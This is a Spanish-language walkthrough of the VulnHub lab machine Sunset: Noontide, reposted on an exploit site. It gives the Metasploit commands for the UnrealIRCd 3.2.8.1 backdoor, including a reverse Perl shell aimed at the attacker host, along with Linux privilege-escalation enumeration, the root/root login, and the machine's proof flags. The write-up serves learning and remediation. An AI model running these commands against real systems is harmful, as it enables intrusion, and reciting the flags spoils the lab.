Sploitus

Exploit for sunset-noontide-pentesting

kitploit · 2026-09-13

Exploit Code

MARKDOWN703 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZALES2004-SUNSET-NOONTIDE-PENTESTING
# Sunset: Noontide — Pruebas de Penetración

Una evaluación profesional de pruebas de penetración y guía de CTF de **Sunset: Noontide** , una máquina intencionalmente vulnerable de **VulnHub**.

Este proyecto documenta el ciclo de vida completo de las pruebas de penetración, incluyendo reconocimiento, enumeración de servicios, investigación de vulnerabilidades, explotación, acceso inicial, post-explotación, escalada de privilegios, prueba de compromiso, evaluación de riesgos, mapeo de MITRE ATT&CK y remediación.

> ⚠️ **Descargo de responsabilidad:** Esta evaluación se realizó contra una máquina intencionalmente vulnerable en un entorno de laboratorio autorizado. Las técnicas y comandos documentados aquí están destinados únicamente a sistemas para los cuales se ha obtenido autorización explícita.

* * *

## 🎯 Objetivos

  * Identificar el host objetivo
  * Enumerar los servicios expuestos
  * Identificar software y versiones vulnerables
  * Investigar vulnerabilidades aplicables
  * Explotar el servicio vulnerable
  * Obtener acceso inicial a la shell
  * Realizar enumeración de post-explotación en Linux
  * Identificar oportunidades de escalada de privilegios
  * Obtener acceso a nivel root
  * Recuperar los archivos de prueba de usuario y root
  * Documentar los hallazgos de seguridad
  * Proporcionar recomendaciones de remediación



* * *

## 🖥️ Entorno de Laboratorio

Componente| Detalles  
---|---  
Objetivo| Sunset: Noontide  
Plataforma| VulnHub  
IP Objetivo| `10.106.186.186`  
Nombre de Host Objetivo| `noontide`  
SO Objetivo| Debian GNU/Linux 10 (Buster)  
Arquitectura| x86_64  
Plataforma Atacante| Kali Linux  
IP Atacante| `10.106.186.204`  
Tipo de Evaluación| Evaluación de Laboratorio Autorizada  
Riesgo General| **CRÍTICO**  
Resultado de la Evaluación| **Compromiso Total del Sistema**  
  
* * *

## 🔐 Cadena de Ataque

**Descubrimiento del Objetivo → Enumeración con Nmap → UnrealIRCd 3.2.8.1 Identificado → SearchSploit → CVE-2010-2075 Identificado → Explotación con Metasploit → Shell de Comandos Remota → Shell como`server` → Post-Explotación en Linux → Credencial Root Débil → `su root` → UID 0 / Acceso Root → Archivos de Prueba de Usuario y Root**

* * *

# 1\. Reconocimiento

Se realizó un descubrimiento de red inicial para identificar el objetivo vulnerable.

El objetivo fue finalmente identificado como:

`10.106.186.186`

Durante el reconocimiento, `10.106.186.142` fue identificado como la puerta de enlace predeterminada en lugar del objetivo previsto.

Esto resalta la importancia de identificar correctamente el objetivo antes de realizar pruebas de seguridad adicionales, particularmente en una red de laboratorio puenteada o compartida.

* * *

# 2\. Enumeración de Servicios

Se realizó la detección de servicios y versiones con Nmap contra el objetivo usando:

`nmap -sV 10.106.186.186`

El servicio expuesto significativo identificado durante la evaluación fue:

`6667/tcp open irc UnrealIRCd`

Luego se realizó un escaneo más detallado usando:

`nmap -sC -sV -Pn -p 6667 10.106.186.186`

El servicio fue identificado como:

`UnrealIRCd 3.2.8.1`

El servicio IRC también reportó:

`irc.foonet.com`

El servicio UnrealIRCd expuesto se convirtió en la superficie de ataque principal investigada durante la evaluación.

* * *

# 3\. Investigación de Vulnerabilidades

Se utilizó SearchSploit para investigar vulnerabilidades documentadas públicamente asociadas con la versión de UnrealIRCd descubierta.

Comando:

`searchsploit UnrealIRCd 3.2.8.1`

El resultado relevante fue:

`UnrealIRCd 3.2.8.1 - Backdoor Command Exec`

`linux/remote/16922.rb`

La vulnerabilidad fue identificada como:

**CVE-2010-2075**

### Vulnerabilidad

**Ejecución de Comandos por Backdoor en UnrealIRCd 3.2.8.1**

### Severidad

**Crítica**

### Tipo de Ataque

**Ejecución Remota de Comandos**

### Impacto de Seguridad

La explotación exitosa del servicio vulnerable permite a un atacante ejecutar comandos remotamente en el sistema objetivo.

* * *

# 4\. Explotación con Metasploit

El servicio IRC vulnerable fue explotado usando el Framework Metasploit.

El módulo seleccionado fue:

`exploit/unix/irc/unreal_ircd_3281_backdoor`

Configuración de ejemplo:

`use exploit/unix/irc/unreal_ircd_3281_backdoor`

`set RHOST 10.106.186.186`

Los intentos iniciales de payload no produjeron una sesión utilizable.

Posteriormente se seleccionó un payload compatible de Perl inverso para Unix:

`set payload cmd/unix/reverse_perl`

`set LHOST 10.106.186.204`

`set LPORT 4444`

`run`

Metasploit reportó que el objetivo parecía vulnerable y abrió exitosamente una sesión de shell de comandos.

* * *

# 5\. Acceso Inicial

La shell obtenida fue verificada usando:

`whoami`

Resultado:

`server`

Esto confirmó la ejecución remota de comandos exitosa como la cuenta `server`.

El directorio de trabajo inicial fue:

`/home/server/irc/Unreal3.2`

En esta etapa, la evaluación progresó desde la explotación remota del servicio hasta la enumeración local de post-explotación.

* * *

# 6\. Enumeración de Post-Explotación

Después de obtener la shell, se realizó la enumeración estándar de Linux para comprender el host comprometido e identificar posibles rutas de escalada de privilegios.

## Usuario Actual

Comando:

`id`

Resultado:

`uid=1000(server) gid=1000(server)`

La cuenta era un usuario no root.

## Nombre de Host

Comando:

`hostname`

Resultado:

`noontide`

## Información del Kernel

Comando:

`uname -a`

Resultado:

`Linux noontide 4.19.0-10-amd64 x86_64`

## Sistema Operativo

Comando:

`cat /etc/os-release`

Resultado:

`Debian GNU/Linux 10 (buster)`

Estos comandos establecieron la identidad actual, el nombre de host, la versión del kernel, el sistema operativo y la configuración general del sistema.

* * *

# 7\. Enumeración de Escalada de Privilegios

Se realizaron varias verificaciones estándar de escalada de privilegios en Linux.

## 7.1 Enumeración de SUID

Comando:

`find / -perm -4000 -type f 2>/dev/null`

Se identificaron binarios SUID estándar como `passwd`, `chsh`, `mount`, `umount`, `su`, `chfn`, `newgrp` y `gpasswd`.

No se identificó ningún binario SUID personalizado o anómalo obvio como el vector de escalada exitoso.

* * *

## 7.2 Enumeración de Sudo

Comando:

`sudo -l`

No se identificó ninguna ruta útil de escalada de privilegios basada en sudo a partir de la salida disponible.

* * *

## 7.3 Enumeración de Cron

Comandos:

`cat /etc/crontab`

`ls -la /etc/cron.d/`

`ls -la /etc/cron.hourly/`

`ls -la /etc/cron.daily/`

`ls -la /etc/cron.weekly/`

Los trabajos programados observados eran trabajos de sistema estándar al estilo Debian.

No se identificó ningún trabajo cron de root escribible obvio.

* * *

## 7.4 Enumeración de Archivos Escribibles

Comando:

`find / -writable -type f 2>/dev/null | head -100`

Los resultados iniciales fueron principalmente pseudo-archivos de `/proc` y no revelaron un vector práctico de escalada de privilegios.

* * *

## 7.5 Capacidades de Linux

Comando:

`getcap -r / 2>/dev/null`

No se identificó ninguna escalada de privilegios útil basada en capacidades a partir de la salida resultante.

* * *

# 8\. Escalada de Privilegios

La ruta exitosa de escalada de privilegios se basó en las credenciales root intencionalmente débiles configuradas en la máquina vulnerable.

Se accedió a la cuenta root usando:

`su root`

Contraseña:

`root`

El acceso root fue luego verificado usando:

`id`

Resultado:

`uid=0(root) gid=0(root) groups=0(root)`

La identidad también fue confirmada usando:

`whoami`

Resultado:

`root`

Esto confirmó el control administrativo completo del sistema objetivo.

* * *

# 9\. Prueba de Compromiso

## 9.1 Prueba a Nivel de Usuario

El archivo de prueba a nivel de usuario se encontraba en:

`/home/server/local.txt`

Comando:

`cat /home/server/local.txt`

Resultado:

`c53c08b5bf2b0801c5d0c24149826a6e`

* * *

## 9.2 Prueba a Nivel de Root

El archivo de prueba a nivel de root se encontraba en:

`/root/proof.txt`

Comando:

`cat /root/proof.txt`

Resultado:

`ab28c8ca8da1b9ffc2d702ac54221105`

La prueba de root también devolvió:

`Thanks for playing! - Felipe Winsnes (@whitecr0wz)`

La recuperación de ambos archivos de prueba confirma el compromiso exitoso desde el acceso remoto inicial hasta el control a nivel de root.

* * *

# 10\. Resumen de Riesgos

ID| Hallazgo| Severidad| Impacto  
---|---|---|---  
VULN-01| Backdoor en UnrealIRCd 3.2.8.1| 🔴 Crítica| Ejecución Remota de Comandos  
VULN-02| Credenciales Root Débiles| 🔴 Crítica| Compromiso Administrativo Total  
  
* * *

# 11\. Hallazgos Detallados

## VULN-01 — Backdoor en UnrealIRCd 3.2.8.1

**Severidad:** Crítica

**Servicio Afectado:** IRC / TCP 6667

**Software Afectado:** UnrealIRCd 3.2.8.1

**CVE:** CVE-2010-2075

**Tipo de Ataque:** Ejecución Remota de Comandos

**Impacto Observado:** Shell remota obtenida como `server`

### Descripción

El servicio UnrealIRCd expuesto estaba ejecutando una versión vulnerable asociada con una vulnerabilidad conocida de ejecución de comandos por backdoor.

La vulnerabilidad fue identificada mediante la enumeración de servicios y la investigación con SearchSploit y fue explotada exitosamente usando Metasploit.

### Impacto Empresarial

Un atacante capaz de alcanzar el servicio IRC vulnerable podría ejecutar comandos remotamente y obtener acceso no autorizado al host.

* * *

## VULN-02 — Credenciales Root Débiles

**Severidad:** Crítica

**Cuenta Afectada:** `root`

**Credencial Observada:** `root / root`

**Impacto Observado:** Acceso administrativo UID 0

### Descripción

La cuenta root estaba configurada con una credencial extremadamente débil.

Después de obtener una shell local como `server`, se accedió a la cuenta root usando la credencial débil y se verificó con UID 0.

### Impacto Empresarial

Un atacante que obtiene acceso a la shell local puede usar la credencial root débil para obtener el control completo del sistema operativo.

* * *

# 12\. Mapeo de MITRE ATT&CK

Técnica| ID| Actividad Observada  
---|---|---  
Network Service Scanning| T1046| Enumeración con Nmap  
Exploit Public-Facing Application| T1190| Explotación del servicio UnrealIRCd expuesto  
Command and Scripting Interpreter| T1059| Shell de comandos remota  
Valid Accounts| T1078| Uso de credenciales root  
Account Discovery| T1087| Enumeración de identidad y usuarios  
System Information Discovery| T1082| `uname` y `/etc/os-release`  
File and Directory Discovery| T1083| Enumeración del sistema de archivos  
Scheduled Task/Job Discovery| T1053| Enumeración de cron  
Permission Groups Discovery| T1069| `id` y enumeración de grupos  
  
* * *

# 13\. Recomendaciones de Remediación

## 13.1 Eliminar o Actualizar UnrealIRCd

Reemplace la instalación vulnerable de UnrealIRCd con una versión confiable y soportada.

Verifique la integridad del software y la procedencia del paquete antes del despliegue.

## 13.2 Eliminar Software con Backdoor

Si la integridad o procedencia del software es incierta, reconstruya el sistema usando medios de instalación confiables y paquetes verificados.

## 13.3 Eliminar Credenciales Débiles

Reemplace las credenciales predeterminadas y débiles con credenciales administrativas fuertes y únicas.

No use contraseñas simples como `root`.

## 13.4 Restringir la Exposición de IRC

Si IRC es necesario, restrinja el acceso usando:

  * Reglas de firewall
  * Segmentación de red
  * Acceso VPN
  * Restricciones de IP de origen



## 13.5 Aplicar Actualizaciones de Seguridad

Mantenga un proceso documentado de gestión de parches para el sistema operativo y todos los servicios expuestos.

## 13.6 Monitorear el Acceso Privilegiado

Registre y revise:

  * Autenticación administrativa
  * Acceso root
  * Cambios de privilegios
  * Actividad de autenticación sospechosa



* * *

# 14\. Metodología de Pruebas de Penetración

Fase| Actividades  
---|---  
Reconocimiento| Descubrimiento de red e identificación del objetivo  
Enumeración| Detección de servicios/versiones con Nmap  
Investigación de Vulnerabilidades| Identificación de módulos con SearchSploit y Metasploit  
Explotación| Explotación del backdoor de UnrealIRCd  
Acceso Inicial| Shell de comandos como `server`  
Post-Explotación| Enumeración de identidad, SO, sistema de archivos y privilegios  
Escalada de Privilegios| Verificaciones de SUID, sudo, cron, archivos escribibles y capacidades  
Recolección de Evidencia| Archivos de prueba de usuario y root  
Reporte| Hallazgos, análisis de riesgos y remediación  
  
* * *

# 15\. Herramientas Utilizadas

  * **Nmap** — Descubrimiento de red y enumeración de servicios
  * **SearchSploit** — Investigación de vulnerabilidades y exploits
  * **Metasploit Framework** — Explotación y establecimiento de sesión
  * **Utilidades de Línea de Comandos de Linux** — Post-explotación y enumeración de privilegios



* * *

# 16\. Habilidades Demostradas

  * Reconocimiento de Red
  * Descubrimiento de Hosts
  * Escaneo de Puertos
  * Enumeración de Servicios
  * Identificación de Versiones
  * Evaluación de Vulnerabilidades
  * Investigación de CVE
  * SearchSploit
  * Metasploit Framework
  * Ejecución Remota de Comandos
  * Enumeración de Linux
  * Enumeración de SUID
  * Enumeración de Sudo
  * Enumeración de Cron
  * Enumeración de Archivos Escribibles
  * Capacidades de Linux
  * Evaluación de Seguridad de Credenciales
  * Escalada de Privilegios
  * Prueba de Compromiso
  * Mapeo de MITRE ATT&CK
  * Evaluación de Riesgos
  * Reporte de Seguridad
  * Análisis de Remediación



* * *

# 17\. Evaluación Final

El host **Sunset: Noontide** fue comprometido exitosamente desde el acceso de red inicial hasta el control completo a nivel de root.

La vulnerabilidad principal de acceso inicial fue el **backdoor de UnrealIRCd 3.2.8.1 (CVE-2010-2075)**.

La vulnerabilidad proporcionó ejecución remota de comandos y resultó en una shell inicial como la cuenta `server`.

Luego se realizó la enumeración de post-explotación, incluyendo verificaciones de SUID, sudo, cron, archivos escribibles, capacidades de Linux, identidad, sistema operativo y sistema de archivos.

Estas verificaciones no identificaron la ruta de escalada exitosa.

El acceso administrativo completo se logró finalmente a través de las credenciales root débiles de la máquina.

La recuperación exitosa de ambos archivos de prueba, a nivel de usuario y de root, confirmó el compromiso total del sistema.

### Evaluación General

**CRÍTICO — Compromiso Total del Sistema Logrado**

* * *

# 18\. Resultados de la Evaluación

Objetivo| Estado  
---|---  
Objetivo Identificado| ✅ PASS  
Servicio Expuesto Identificado| ✅ PASS  
Versión Vulnerable Identificada| ✅ PASS  
CVE Identificado| ✅ PASS  
Ejecución Remota de Comandos| ✅ PASS  
Shell Inicial como `server`| ✅ PASS  
Prueba de Usuario Recuperada| ✅ PASS  
Escalada de Privilegios| ✅ PASS  
Acceso Root Verificado| ✅ PASS  
Prueba de Root Recuperada| ✅ PASS  
  
* * *

# 19\. Informe Profesional de Pruebas de Penetración

Se incluye un informe detallado y profesional de pruebas de penetración con este proyecto:

**`Sunset-Noontide-Penetration-Testing-Report.pdf`**

El informe contiene:

  * Resumen Ejecutivo
  * Control de Documentos
  * Alcance y Reglas de Compromiso
  * Resumen de Riesgos
  * Ruta de Ataque
  * Reconocimiento
  * Enumeración de Servicios
  * Investigación de Vulnerabilidades
  * Explotación con Metasploit
  * Acceso Inicial
  * Post-Explotación
  * Escalada de Privilegios
  * Evidencia y Archivos de Prueba
  * Hallazgos Detallados
  * Mapeo de MITRE ATT&CK
  * Recomendaciones de Remediación
  * Evaluación Final



* * *

# 20\. Evidencia

Estructura sugerida del repositorio:

`sunset-noontide-pentesting/`

`├── README.md`

`├── Sunset-Noontide-Penetration-Testing-Report.pdf`

`└── evidence/`

` ├── 01-target-discovery.png`

` ├── 02-nmap-enumeration.png`

` ├── 03-searchsploit.png`

` ├── 04-metasploit-exploitation.png`

` ├── 05-initial-shell.png`

` ├── 06-post-exploitation.png`

` ├── 07-privilege-escalation.png`

` └── 08-root-proof.png`

Las capturas de pantalla deben contener únicamente información del entorno de laboratorio autorizado.

* * *

# 21\. Lecciones Aprendidas

Esta evaluación proporcionó experiencia práctica en:

  1. Identificar correctamente el objetivo previsto en un entorno de red.
  2. Realizar enumeración de servicios y versiones con Nmap.
  3. Investigar vulnerabilidades usando SearchSploit.
  4. Seleccionar un módulo de exploit de Metasploit apropiado.
  5. Solucionar problemas de compatibilidad de payloads.
  6. Establecer una shell de comandos remota.
  7. Realizar enumeración de post-explotación en Linux.
  8. Verificar sistemáticamente vectores comunes de escalada de privilegios.
  9. Identificar credenciales administrativas débiles.
  10. Verificar el compromiso a nivel de root.
  11. Recopilar evidencia de prueba de compromiso.
  12. Documentar vulnerabilidades en un formato profesional de pruebas de penetración.



* * *

# 22\. ⚠️ Descargo de Responsabilidad Legal y Ético

Este repositorio está destinado estrictamente a:

  * Educación en ciberseguridad
  * Pruebas de penetración autorizadas
  * Práctica de CTF
  * Investigación de vulnerabilidades
  * Entornos de laboratorio



Las técnicas documentadas en este repositorio deben realizarse únicamente contra sistemas para los cuales se ha obtenido autorización explícita.

No use estas técnicas contra sistemas de producción, infraestructura pública o sistemas de terceros sin permiso.

* * *

# 👨‍💻 Autor

**Alen Sales K S**

Ciberseguridad | Pruebas de Penetración | SOC | Seguridad de Redes

GitHub: https://github.com/zales2004

* * *

# ⭐ Resumen del Proyecto

**Sunset: Noontide** demuestra un flujo de trabajo completo de pruebas de penetración:

**Reconocimiento → Enumeración → Investigación de Vulnerabilidades → Explotación → Acceso Inicial → Post-Explotación → Escalada de Privilegios → Acceso Root → Recolección de Evidencia → Evaluación de Riesgos → Reporte de Seguridad**

**Resultado de la Evaluación: CRÍTICO — Compromiso Total del Sistema Logrado**